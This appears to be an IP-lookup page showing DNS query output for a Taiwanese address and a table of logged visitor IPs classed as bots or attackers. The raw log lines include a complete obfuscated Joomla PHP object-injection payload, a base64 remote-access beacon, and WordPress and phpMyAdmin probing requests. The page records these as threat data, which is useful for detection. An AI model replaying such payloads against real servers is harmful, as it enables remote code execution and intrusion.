City: Keelung
Region: Taiwan
Country: Taiwan, China
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 114.43.53.6
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 10591
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;114.43.53.6. IN A
;; AUTHORITY SECTION:
. 374 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2020093002 1800 900 604800 86400
;; Query time: 87 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Thu Oct 01 15:02:03 CST 2020
;; MSG SIZE rcvd: 1156.53.43.114.in-addr.arpa domain name pointer 114-43-53-6.dynamic-ip.hinet.net.Server: 183.60.83.19
Address: 183.60.83.19#53
Non-authoritative answer:
6.53.43.114.in-addr.arpa name = 114-43-53-6.dynamic-ip.hinet.net.
Authoritative answers can be found from:| IP | Type | Details | Datetime |
|---|---|---|---|
| 45.114.10.12 | attack | 45.114.10.12 - - [06/May/2019:21:45:27 +0800] "GET / HTTP/1.1" 301 194 "-" "}__test|O:21:\\x22JDatabaseDriverMysqli\\x22:3:{s:2:\\x22fc\\x22;O:17:\\x22JSimplepieFactory\\x22:0:{}s:21:\\x22\\x5C0\\x5C0\\x5C0disconnectHandlers\\x22;a:1:{i:0;a:2:{i:0;O:9:\\x22SimplePie\\x22:5:{s:8:\\x22sanitize\\x22;O:20:\\x22JDatabaseDriverMysql\\x22:0:{}s:8:\\x22feed_url\\x22;s:277:\\x22eval(chr(100).chr(105).chr(101).chr(40).chr(109).chr(100).chr(53).chr(40).chr(68).chr(73).chr(82).chr(69).chr(67).chr(84).chr(79).chr(82).chr(89).chr(95).chr(83).chr(69).chr(80).chr(65).chr(82).chr(65).chr(84).chr(79).chr(82).chr(41).chr(41).chr(59));JFactory::getConfig();exit\\x22;s:19:\\x22cache_name_function\\x22;s:6:\\x22assert\\x22;s:5:\\x22cache\\x22;b:1;s:11:\\x22cache_class\\x22;O:20:\\x22JDatabaseDriverMysql\\x22:0:{}}i:1;s:4:\\x22init\\x22;}}s:13:\\x22\\x5C0\\x5C0\\x5C0connection\\x22;b:1;}\\xF0\\xFD\\xFD\\xFD"
45.114.10.12 - - [06/May/2019:21:45:27 +0800] "GET / HTTP/1.1" 301 194 "-" "}__test|O:21:\\x22JDatabaseDriverMysqli\\x22:3:{s:2:\\x22fc\\x22;O:17:\\x22JSimplepieFactory\\x22:0:{}s:21:\\x22\\x5C0\\x5C0\\x5C0disconnectHandlers\\x22;a:1:{i:0;a:2:{i:0;O:9:\\x22SimplePie\\x22:5:{s:8:\\x22sanitize\\x22;O:20:\\x22JDatabaseDriverMysql\\x22:0:{}s:8:\\x22feed_url\\x22;s:277:\\x22eval(chr(100).chr(105).chr(101).chr(40).chr(109).chr(100).chr(53).chr(40).chr(68).chr(73).chr(82).chr(69).chr(67).chr(84).chr(79).chr(82).chr(89).chr(95).chr(83).chr(69).chr(80).chr(65).chr(82).chr(65).chr(84).chr(79).chr(82).chr(41).chr(41).chr(59));JFactory::getConfig();exit\\x22;s:19:\\x22cache_name_function\\x22;s:6:\\x22assert\\x22;s:5:\\x22cache\\x22;b:1;s:11:\\x22cache_class\\x22;O:20:\\x22JDatabaseDriverMysql\\x22:0:{}}i:1;s:4:\\x22init\\x22;}}s:13:\\x22\\x5C0\\x5C0\\x5C0connection\\x22;b:1;}\\xF0\\xFD\\xFD\\xFD" |
2019-05-06 21:47:27 |
| 31.193.131.164 | botsattack | 31.193.131.164 - - [04/May/2019:08:58:36 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 301 194 "-" "python-requests/2.21.0" 31.193.131.164 - - [04/May/2019:08:58:42 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 404 209 "-" "python-requests/2.21.0" |
2019-05-04 08:59:08 |
| 133.175.83.191 | bots | 133.175.83.191 - - [24/Apr/2019:09:17:14 +0800] "GET / HTTP/1.1" 301 194 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" 133.175.83.191 - - [24/Apr/2019:09:17:15 +0800] "GET / HTTP/1.1" 200 10270 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1" |
2019-04-24 09:17:45 |
| 107.178.194.205 | bots | 107.178.194.205 - - [25/Apr/2019:22:38:55 +0800] "GET /check-ip/71.11.160.200 HTTP/1.1" 200 9160 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~feedly-nikon3)" 107.178.194.205 - - [25/Apr/2019:22:38:56 +0800] "GET /check-ip/71.11.160.200 HTTP/1.1" 200 8974 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~feedly-nikon3)" 107.178.194.205 - - [25/Apr/2019:22:38:57 +0800] "GET /check-ip/71.11.160.200 HTTP/1.1" 200 8657 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 AppEngine-Google; (+http://code.google.com/appengine; appid: s~feedly-nikon3)" |
2019-04-25 22:40:59 |
| 5.231.205.168 | attack | 5.231.205.168 - - [30/Apr/2019:08:11:10 +0800] "POST http://gp.snaware.com/judge2/?key=KE%2baDqGx%2b3sJAbJ4n5ZM0n%2b%2fkGLKQ60oDMVbiMoOQ1dvWwQNnbYO35W91IR2djei&h=9Q7Kem7Vui&f=false&t=111105 HTTP/1.1" 301 194 "gatherproxy.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; chromeframe; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; Zune 3.0)" |
2019-04-30 08:12:26 |
| 129.204.239.125 | attack | 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 301 194 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" 129.204.239.125 - - [27/Apr/2019:05:15:17 +0800] "GET /phpmyadmin HTTP/1.1" 404 232 "http://118.25.52.138/phpmyadmin" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)" |
2019-04-27 06:48:37 |
| 174.138.9.42 | botsattack | UDP port(0) attack 1/3s |
2019-05-03 18:25:37 |
| 71.6.158.166 | botsattack | 71.6.158.166 - - [05/May/2019:06:08:15 +0800] "" 400 0 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:17 +0800] "" 400 0 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:17 +0800] "" 400 0 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:19 +0800] "" 400 0 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:23 +0800] "quit" 400 182 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:23 +0800] "GET /robots.txt HTTP/1.1" 200 472 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:27 +0800] "GET /.well-known/security.txt HTTP/1.1" 404 232 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:27 +0800] "GET /sitemap.xml HTTP/1.1" 499 0 "-" "-" 71.6.158.166 - - [05/May/2019:06:08:28 +0800] "GET /favicon.ico HTTP/1.1" 200 4286 "-" "python-requests/2.10.0" 71.6.158.166 - - [05/May/2019:06:08:28 +0800] "" 400 0 "-" "-" |
2019-05-05 06:09:11 |
| 203.208.60.44 | bots | google adsense爬虫 203.208.60.44 - - [26/Apr/2019:16:00:44 +0800] "GET / HTTP/1.1" 200 3419 "-" "Mediapartners-Google" 203.208.60.22 - - [26/Apr/2019:16:00:47 +0800] "GET /static/bootstrap/js/jquery-3.2.1.slim.min.js HTTP/1.1" 200 69597 "https://ipinfo.asytech.cn/" "Mediapartners-Google" 203.208.60.6 - - [26/Apr/2019:16:00:49 +0800] "GET /static/bootstrap/js/bootstrap.min.js HTTP/1.1" 200 48944 "https://ipinfo.asytech.cn/" "Mediapartners-Google" 203.208.60.95 - - [26/Apr/2019:16:00:51 +0800] "GET /static/bootstrap/css/bootstrap.min.css HTTP/1.1" 200 144877 "https://ipinfo.asytech.cn/" "Mediapartners-Google" 203.208.60.20 - - [26/Apr/2019:16:00:53 +0800] "GET /static/bootstrap/js/popper.min.js HTTP/1.1" 200 19188 "https://ipinfo.asytech.cn/" "Mediapartners-Google" |
2019-04-26 16:04:48 |
| 41.58.74.105 | bots | 41.58.74.105 - - [01/May/2019:08:55:44 +0800] "HEAD /check-ip/185.244.25.124 HTTP/1.1" 200 0 "https://ipinfo.asytech.cn/check-ip/68.0.71.29" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2376.69 Safari/537.36" 41.58.74.105 - - [01/May/2019:08:55:44 +0800] "HEAD /check-ip/72.14.199.112 HTTP/1.1" 200 0 "https://ipinfo.asytech.cn/check-ip/68.0.71.29" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2376.69 Safari/537.36" 41.58.74.105 - - [01/May/2019:08:55:44 +0800] "HEAD /check-ip/222.186.10.54 HTTP/1.1" 200 0 "https://ipinfo.asytech.cn/check-ip/68.0.71.29" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2376.69 Safari/537.36" 41.58.74.105 - - [01/May/2019:08:55:44 +0800] "HEAD /check-ip/5.231.205.168 HTTP/1.1" 200 0 "https://ipinfo.asytech.cn/check-ip/68.0.71.29" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2376.69 Safari/537.36" 41.58.74.105 - - [01/May/2019:08:55:44 +0800] "HEAD /check-ip/138.91.125.32 HTTP/1.1" 200 0 "https://ipinfo.asytech.cn/check-ip/68.0.71.29" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2376.69 Safari/537.36" |
2019-05-01 09:10:16 |
| 66.206.0.172 | bots | 66.206.0.172 - - [27/Apr/2019:04:42:55 +0800] "GET /check-ip/33.117.246.3 HTTP/1.1" 200 90035 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" 66.206.0.172 - - [27/Apr/2019:04:42:55 +0800] "GET /check-ip/100.35.13.79 HTTP/1.1" 200 92159 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2a1pre) Gecko/20090316 Minefield/3.2a1pre" 66.206.0.172 - - [27/Apr/2019:04:42:58 +0800] "GET /check-ip/90.143.27.14 HTTP/1.1" 200 90613 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.9) Gecko/20071030 SeaMonkey/1.1.6" 66.206.0.172 - - [27/Apr/2019:04:43:04 +0800] "GET /check-ip/139.199.6.107 HTTP/1.1" 200 92085 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.8.1.21) Gecko/20090331 K-Meleon/1.5.3" |
2019-04-27 06:51:42 |
| 66.240.205.34 | botsattack | 66.240.205.34 - - [07/May/2019:09:30:04 +0800] "145.ll|'|'|SGFjS2VkX0Q0OTkwNjI3|'|'|WIN-JNAPIER0859|'|'|JNapier|'|'|19-02-01|'|'||'|'|Win 7 Professional SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|AA==|'|'|112.inf|'|'|SGFjS2VkDQoxOTIuMTY4LjkyLjIyMjo1NTUyDQpEZXNrdG9wDQpjbGllbnRhLmV4ZQ0KRmFsc2UNCkZhbHNlDQpUcnVlDQpGYWxzZQ==12.act|'|'|AA==" 400 182 "-" "-" |
2019-05-07 09:31:34 |
| 114.35.105.141 | botsattack | 爬虫攻击phpadmin、pma、sql等 |
2019-05-05 11:08:25 |
| 177.101.179.22 | bots | 177.101.179.22 - - [26/Apr/2019:09:20:06 +0800] "GET /index.php/category/root/sogou/ HTTP/1.1" 200 14530 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 177.101.179.22 - - [26/Apr/2019:09:20:12 +0800] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 4251 "https://www.eznewstoday.com/index.php/category/root/sogou/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 177.101.179.22 - - [26/Apr/2019:09:20:14 +0800] "GET /wp-includes/js/wp-embed.min.js?ver=5.1.1 HTTP/1.1" 200 4551 "https://www.eznewstoday.com/index.php/category/root/sogou/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 177.101.179.22 - - [26/Apr/2019:09:20:16 +0800] "GET /wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 37713 "https://www.eznewstoday.com/index.php/category/root/sogou/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 177.101.179.22 - - [26/Apr/2019:09:20:18 +0800] "GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 7843 "https://www.eznewstoday.com/index.php/category/root/sogou/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" |
2019-04-26 09:21:44 |
| 58.38.194.30 | bots | isSource urlParam不知道从哪来的疑似爬虫 58.38.194.30 - - [25/Apr/2019:15:22:16 +0800] "GET /index.php/category/root/deep-learning/?isSource=true&category=%E5%85%A8%E9%83%A8&urlParam=%7B%7D HTTP/1.1" 200 19658 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.6823.400 QQBrowser/10.3.3117.400" |
2019-04-25 15:24:12 |